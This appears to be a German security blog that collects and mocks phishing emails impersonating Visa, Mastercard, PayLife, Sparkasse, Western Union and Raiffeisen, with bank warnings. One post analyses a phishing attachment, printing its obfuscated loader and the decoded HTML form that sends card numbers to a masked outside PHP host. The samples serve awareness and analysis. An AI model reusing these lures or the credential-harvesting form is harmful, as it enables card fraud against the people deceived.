Web-Sicherheit

Januar 3, 2012

Erster Phish im neuen Jahr

Filed under: Allgemein — sebastiankuebeck @ 09:27
Tags: , , , , , ,

Manche Phisher glauben offenbar, dass zahlreiche Kreditkarteninhaber die Silvesterfeierlichkeiten bis heute ausgedehnt haben und so alles ausfüllen und unterschreiben, was ihnen per E-Mail untergejubelt wird.

Wünsche also neues gutes Jahr mit neues, nicht sonderlich ambitioniert gestaltetes Phish! ;-)

Betreff: Neuen 2012 Wichtige Updates !

Sehr geehrter Inhaber der Kreditkarte,

Ihre Kreditkarte wird vorübergehend für neue Sicherheits-Updates 
gesperrt.
Wir müssen unsere Datenbank zu aktualisieren jedes Jahr.
Aus diesem Grund haben wir vorübergehend Ihre Kreditkarte 
gesperrt.
Ihre Kreditkarte wird freigeschaltet, nachdem Sie und laden Sie 
das beigefügte Formular werden.

Danke,
Visa und Mastercard Support Team.
 © Copyright Visa Europe 2012

Die Hinweise auf Sparkasse.de gelten natürlich auch in diesem Fall sowie für jede andere Bank und Kreditkartengesellschaft von hier bis mindestens Westsamoa…

Geben Sie niemals Ihre PIN und TAN heraus! Auch wenn Sie von scheinbar seriöser Stelle dazu aufgefordert werden. Die Sparkassen [Visa, MasterCard, oder welcher Finanzdienstleister auch immer] werden Sie weder per E-Mail noch persönlich am Telefon auffordern, Ihre Zugangsdaten zum Online-Banking preiszugeben oder aus einer E-Mail heraus Webseiten zu öffnen, um dort Kontodaten oder Kreditkarten-Nummern einzugeben.

September 12, 2011

Neue Phishing-Mails haben es auf Kunden der PayLife abgesehen

Filed under: Allgemein — sebastiankuebeck @ 06:58
Tags: , , , , , ,

Nun haben es die Phisher auf die Kunden der österreichischen Kreditkartengesellschaft PayLife abgesehen. Nein, die Deutschkenntnisse der Phisher haben sich nicht verbessert (siehe den ähnlich gestalteten Phish von Mitte August). Auch ist das Formular, welches der E-Mail beiliegt nicht sonderlich ambitioniert gestaltet und beinhaltet keine Verschleierungstaktiken.

Betreff: Hinweis: Dies ist Ihre offizielle Mitteilung von PayLife Bank GmbH. 

Dies ist Ihre offizielle Mitteilung von PayLife Bank GmbH.

Wir haben pur neuen SSL-Server aktualisiert, um unseren Kunden 
für eine bessere und sichere Online-Transaktionen dienen. 
Aufgrund dieser jüngsten Aktualisierung werden Sie aufgefordert, 
Ihre Informationen an uns zu aktualisieren.

Hinweis: Dies ist verry wichtig für Ihre Kreditkarte Sicherheit.

Bitte laden Sie das beigefügte Formular und füllen Sie alle 
Schritte.

Vielen Dank für Ihr Verständnis,
Paylife Bank GmbH

Es ist also auch in diesem Fall “verry wichtig”, die Hinweise auf Sparkasse.de zu befolgen, welche natürlich auch für österreichische Kreditkarteninhaber gelten:

Geben Sie niemals Ihre PIN und TAN heraus! Auch wenn Sie von scheinbar seriöser Stelle dazu aufgefordert werden. Die Sparkassen [Visa, MasterCard, oder welcher Finanzdienstleister auch immer] werden Sie weder per E-Mail noch persönlich am Telefon auffordern, Ihre Zugangsdaten zum Online-Banking preiszugeben oder aus einer E-Mail heraus Webseiten zu öffnen, um dort Kontodaten oder Kreditkarten-Nummern einzugeben.

August 18, 2011

Neue Phishing-Mails machen Jagt auf Kreditkartendaten

Filed under: Allgemein — sebastiankuebeck @ 08:58
Tags: , , , , ,

Die Phishing-Mails vom Juni, die vorgeben, Nachrichten der Sparkasse zu sein, haben offenbar Nachahmer gefunden. Diesmal scheinen die Nachrichten aus Mexiko zu kommen und Deutsch erweist sich wieder einmal als eine Sprache, die nicht ganz so leicht zu lernen ist…

Betreff: 	Wir erkannten unregelmäßige Aktivitäten auf Ihrem Konto!
Datum: 	17 Aug 2011 23:37:51 +0100
Von: 	Visa und Mastercard Alarmzentrale
An: 	??????

Sehr geehrter Kunde,

Wir erkannten unregelmäßige Aktivitäten auf Ihrem Verified by
Visa und MasterCard SecureCode
Internet-Banking-Konto auf 18/08/2011.

Zu Ihrem Schutz und notwendig, um dies zu überprüfen
Aktivität, bevor sie auch weiterhin den Einsatz
Konto.

Bitte laden Sie das Dokument im Anhang zu dieser
E-Mail an den Aktivitäten Ihres Kontos zu überprüfen.

Wir werden die Aktivitäten auf Ihrem Konto überprüfen
mit Ihnen und zu überprüfen,

und wird uns erlauben, die Beschränkungen auferlegt beseitigen
Ihr Konto.

Wenn Sie auf unsere Anfrage zu ignorieren, wählen wir
temporaly aber zu suspendieren Ihrem Konto.

Wir bitten Sie, mindestens 48 Stunden für den Fall zu ermöglichen
untersucht, und Sie sollten Ihr Konto bei, dass der Check
Zeit.

Mit freundlichen Grüßen,
Customer Communications Manager,
© Copyright 2011 Verified by Visa und MasterCard SecureCode. Alle
Rechte vorbehalten

Die E-Mail enthält einen Anhang mit folgendem Formular:

Das PHP-Script, in dem die Kartendaten eingesammelt werden, befindet sich offenbar in Neuseeland. Insgesamt ist die Täuschung allerdings weniger raffiniert, als die vom Juni. Das Formular ist allerdings optisch besser gestaltet.

Die Hinweise auf Sparkasse.de gelten natürlich auch in diesem Fall:

Geben Sie niemals Ihre PIN und TAN heraus! Auch wenn Sie von scheinbar seriöser Stelle dazu aufgefordert werden. Die Sparkassen [Visa, MasterCard, oder welcher Finanzdienstleister auch immer] werden Sie weder per E-Mail noch persönlich am Telefon auffordern, Ihre Zugangsdaten zum Online-Banking preiszugeben oder aus einer E-Mail heraus Webseiten zu öffnen, um dort Kontodaten oder Kreditkarten-Nummern einzugeben.

Juni 30, 2011

Achtung vor MasterCard SecureCode und Verified by Visa!

Filed under: Allgemein — sebastiankuebeck @ 15:35
Tags: , , , , ,

Zurzeit sind besonders “kreativ” gestaltete Phishing-Mails im Umlauf, die den Empfänger auffordern, sich für MasterCard SecureCode oder Verified by Visa (Der Sammelbegriff für diese  Technologien ist 3-D Secure) zu registrieren:

Mehr Sicherheit beim Internet-Shopping

MasterCardR SecureCode? / Verified by Visa

Einkaufe im Internet mit Ihrer MasterCard / Visa Karte ab sofort
noch sicherer. Nutzen Sie das neue, innovative
Sicherheitsverfahren fur Ihre Sparkassen-Kreditkarte.

Ihre Vorteile

* Sicheres Bezahlen fur Ihren Einkauf im Internet
* Einfache Anwendung
* Weltweites Bezahlverfahren
* Sofort einsatzbereit - ohne Software-Installation auf Ihrem PC

Das bietet Ihnen MasterCardR SecureCode? / Verified by Visa

MasterCardR SecureCode? und Verified by Visa bietet Ihnen einen
zusatzlichen Schutz fur Ihre Bezahlungen im Internet. Ihre
Kreditkartendaten werden vor unberechtigter Verwendung geschutzt,
wenn Sie bei den teilnehmenden Handlern "online shoppen".

In Deutschland sind zum Beispiel schon Otto, Dress-for-less,
parship, Tchibo und viele weitere Handler dabei.

Bitte laden Sie den Anhang und fullen Sie das Formular Passwort
vergessen

Wie im Text richtig steht, verwenden immer mehr Seiten 3D-Secure, allerdings würde keine Bank auf der Welt ihre Kunden auffordern, Kreditkartendaten in einem E-Mail-Formular einzugeben – schon gar nicht mit einer E-Mail, die offensichtlich nicht von einer Person mit Deutsch als Muttersprache verfasst ist! Sollten Sie E-Mails dieser Art bekommen und nicht sicher sein, ob sie legitim sind, oder nicht, kontaktieren Sie bitte Ihre Bank telefonisch. Besser einmal zuviel nachfragen als sich Schwierigkeiten einhandeln! Was passiert, wenn Ihre Kreditkartendaten missbraucht werden, habe ich im Zusammenhang mit dem Vorfall bei Sony beschrieben.

Nun zu den technischen Feinheiten: Das Formular ist ein Anhang und dieser tarnt sich geschickt vor Spam-Filtern, indem er die Zieladresse des Formulars verschleiert:

<script type="text/javascript">document.write('\u003C\u0048\...'); </script>
<TR>
    <TD>Kreditkartennummer:</TD>
    <TD><INPUT maxLength="16" size="15" name="card"></TD></TR>
  <TR>
</TD></TR>
  ...
  <TR>
    <TD colSpan="2" align="middle">www.sparkasse.de/sicherheit/sicherheit/kreditkartenzahlung.html</TD>
  </TR>
</TBODY>
</TABLE>
</FORM>
<script language = "javascript">
  function submitIt(form) {
    if (form.card.value == "") {
     ...
	 return false;
    }else if (form.mm.value == "") {
	 ...
    }else{
      return true;
    }
  }
</script>
</BODY>
</HTML>

Der Verweis auf die http://www.sparkasse.de ist kein gültiger Link, er soll lediglich das Vertrauen der Opfer stärken.

So ist das natürlich kein gültiges HTML, allerdings fügt die Anweisung document.write zusätzlichen Code am Anfang des Formulars ein. Dieser Code ist wiederum JavaScript-codiert, um ungehindert an den Spamfiltern vorbeizukommen. Dekodiert sieht die Geschichte wie folgt aus:

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META http-equiv=Pragma content=no-cache>
<LINK rel="stylesheet" href="http://??????????????.com/css/iepc.css" type="text/css">
</HEAD>
<BODY>
<center><BR /><BR />
<IMG border="0" alt="" src="http://???????????????.net/tmp/Sparkassen_BCS.gif"><br /><br />
<IMG border="0" alt="" src="http://???????????????.net/tmp/vpas_logo.gif" width="79" height="46">    
<IMG border="0" alt="" src="http://???????????????net/tmp/mpas_logo.gif" width="79" height="46"></A></center>
<FORM id="FORM1" onsubmit="return submitIt(this)" method="post" name="FORM1"
  action="http://?????????????.net/tmp/pbs.php">
<TABLE border="0" align="center">
<TBODY>

Das Formular ruft also die Funktion submitIt(this) auf, die die Eingabe überprüft (als verwöhnter Gauner will man natürlich keine unvollständigen Daten…) und das Opfer auf eine türkische Seite verweist. Dort werden die Daten dann vom Verfasser dieser E-Mail entgegengenommen und illegalen Zwecken zugeführt. Obwohl der Betrug leicht zu durchschauen ist, stehen die Chancen gar nicht so schlecht, dass zumindest ein paar Prozent der Empfänger darauf hereinfallen. Wenn man bedenkt, dass diese Mails oft an Millionen von Adressaten geschickt werden, kann da einiges zusammenkommen.

Update 01.07.2011: Offizielle Warnung auf sparkasse.de:

Geben Sie niemals Ihre PIN und TAN heraus! Auch wenn Sie von scheinbar seriöser Stelle dazu aufgefordert werden. Die Sparkassen werden Sie weder per E-Mail noch persönlich am Telefon auffordern, Ihre Zugangsdaten zum Online-Banking preiszugeben oder aus einer E-Mail heraus Webseiten zu öffnen, um dort Kontodaten oder Kreditkarten-Nummern einzugeben.

Wenn Sie eine E-Mail mit entsprechendem Inhalt erhalten, ignorieren Sie diese Aufforderung und leiten Sie die E-Mail an Ihre Sparkasse oder an warnung@sparkasse.de weiter, damit die von den Betrügern genutzten Server identifiziert werden können. Wenn Sie bereits Daten eingegeben haben, setzen Sie sich umgehend mit Ihrer Sparkasse in Verbindung, um Ihre Kreditkarte sperren zu lassen.

Mai 11, 2011

Kleines Phishing-Potpourri

Filed under: Allgemein — sebastiankuebeck @ 15:02
Tags: , , , , , ,

Vor einigen Jahren hatte ich eine wunderschöne E-Mail-Wurm-Sammlung, in der Love-Letter und all seine Verwandten vertreten waren. Leider musste ich dann auf Windows umsteigen, was dazu führte, dass der gnadenlose Kaspersky ihnen allen den Garaus machte. Zum Trost schickt mir ein guter Freund nun regelmäßig amüsante Phishe:

Dieser hier ist offenbar von einem gestressten Phisher, der keine Zeit hatte, eine glaubwürdigere Geschichte zu erfinden:

Betreff: 	Western Union
Datum: 	Thu, 24 Mar 2011 15:42:14 -0700
Von: 	Remove the account limitation.
Antwort an: 	??????????@account.com
An: 	service@westernunion.at

	Your Western Union account has been limited.

  Click on the following link to remove the account limitation:

http://???????????????????.th/westernunion.at/limitation.html

Thank you,

(c) 2001-2010 Western Union Holdings, Inc. Alle Rechte vorbehalten.

Dieser hier versucht es mit eingestreuten kyrillischen Buchstaben um sich vor Spam-Filtern zu tarnen. Ich empfehle hier dringend bei Monty Python’s in die Lehre zu gehen…

Betreff: Sicherheit Nachricht
Von: Western Union
Datum: Fri, 18 Mar 2011 04:18:28 +0100
An: undisclosed-recipients:;
BCC:
Sehr geehrter Kunde,
Wir bedauern Ihnen mitteilen zu kцnnen, dass Ihre Western Union
Online-Konto wurde suspendiert. Eine hohe Anzahl von fehlgeschlagenen
Login-Versuche haben sich auf Ihr Online-Konto erfasst. Als
SicherheitsmaЯnahme mussten wir vorьbergehend Ihr Konto.
Zur Wiederherstellung Ihres Kontos mьssen Sie den unten stehenden Link
klicken und bestдtigen Sie Ihre Kontodaten.

https://www.westernunion.at.?????????????/WUCOMWEB/suspendMid.do?

Bitte beachten Sie, dass das Ignorieren dieser E-Mail fьhrt zu stдndigen
Kontensperrung
Vielen Dank
Western Union

Es ist zwar traurig, dass der Zugruff von Herrn Raiffeisen auf sein Konto eingeschrankt ist
aber eigentlich geht mich das nichts an…

Betreff: 	Zu Ihrem Schutz haben wir den Zugriff auf Ihr Konto eingeschrankt.
Datum: 	Wed, 11 May 2011 14:08:35 +0200
Von: 	Raiffeisen ELBA
An: 	undisclosed-recipients:;

Sehr geehrter Raiffeisen,

Im Rahmen unserer Sicherheitsmaßnahmen prüfen wir regelmäßig alle Vorgänge im
Raifessen-System. Bei einer Überprüfung haben wir kürzlich ein Problem im
Zusammenhang mit Ihrem Konto festgestellt. 

Bei einer kürzlichen Überprüfung Ihres Kontos haben wir festgestellt, dass wir
zusätzliche Angaben von Ihnen benötigen, um Ihnen weiterhin sicheren Service
bieten zu können.

Zu Ihrem Schutz haben wir den Zugriff auf Ihr Konto eingeschränkt, bis
zusätzliche Sicherheitsmaßnahmen getroffen werden können. Wir bitten um
Entschuldigung für eventuelle Unannehmlichkeiten. 

Loggen Sie sich in Ihr Raiffeisen-Konto ein, um den Zugriff auf Ihr Konto innerhalb
der nächsten 15 Tage vollständig wiederherzustellen. Wenn Sie innerhalb des
genannten Zeitraums keine weiteren Informationen bereitstellen, müssen wir den
Fall unter Umständen zu Ihrem Nachteil entscheiden. Beim Einloggen werden die
Maßnahmen angegeben, mit deren Hilfe der reguläre Zustand Ihres Kontos
wiederhergestellt werden kann. Wir arbeiten daran, die Sicherheit Ihres Kontos
zu gewährleisten, und bedanken uns für Ihr Verständnis.

Wie kann ich den Zugriff auf mein Konto wiederherstellen?

Besuchen Sie die Seite Konfliktlösungen hier:

https://banking.raiffeisen.at.?????

Zur Überprüfung Ihres Kontos und einiger oder aller Daten, anhand derer Raiffeisen
entschieden hat, Ihren Kontozugriff einzuschränken, besuchen Sie bitte die Seite
Konfliktlösungen. Wenn Sie nach Prüfung Ihrer Kontodaten weitere klärende
Informationen zu Ihrem Kontozugriff benötigen, wenden Sie sich an Raiffeisen, indem
Sie das Hilfe-Center besuchen und dort auf "Kontakt" klicken. 

Wir bedanken uns für die rasche Erledigung dieser Angelegenheit. Haben Sie bitte
Verständnis, dass dies eine Sicherheitsmaßnahme ist, die Sie und Ihr Konto
schützen soll. Wir bedauern eventuelle Unannehmlichkeiten.

Vielen Dank für Ihre Kooperation. 

Herzliche Grüße

Ihr Raiffeisen-Team 

- ----------------------------------------------------------------
Raiffeisen 2011

The Rubric Theme. Bloggen Sie auf WordPress.com.

Folgen

Erhalte jeden neuen Beitrag in deinen Posteingang.